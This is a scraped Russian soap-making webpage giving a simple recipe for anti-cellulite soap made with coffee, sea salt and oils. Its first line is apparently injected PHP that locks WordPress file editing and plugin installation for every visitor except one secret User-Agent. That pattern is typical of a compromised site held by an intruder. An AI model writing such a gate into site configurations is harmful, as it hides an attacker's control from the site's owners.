if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт мыла против целлюлита | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт мыла против целлюлита

Забота о красивой фигуре – часть жизни любой женщины. Но мастера мыловарения и в этом случае не отстают от тенденций!

Забо­та о кра­си­вой фигу­ре – часть жиз­ни любой жен­щи­ны. Но масте­ра мыло­ва­ре­ния и в этом слу­чае не отста­ют от тен­ден­ций! Анти­цел­люлит­ное мыло уже не дико­вин­ка, а попу­ляр­ное сред­ство. Для изго­тов­ле­ния тако­го мыль­но­го чуда потребуется:

  • осно­ва (про­зрач­ная)
  • мор­ская соль
  • кофе (моло­тый)
  • эфир­ное мас­ло (апель­син)
  • мас­ло вино­град­ной косточки

Мыль­ную осно­ву пла­вим, добав­ля­ем чай­ную лож­ку базо­во­го мас­ла и несколь­ко капель эфир­но­го. Затем высы­па­ем кофе (на 100 г осно­вы сто­ло­вая лож­ка) и при­бли­зи­тель­но столь­ко же соли. Тща­тель­но все пере­ме­ши­ва­ем, раз­ли­ва­ем по фор­мам и остав­ля­ем для застывания.

anticellulitnoe_milo_1

anticellulitnoe_milo_2

anticellulitnoe_milo_3


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!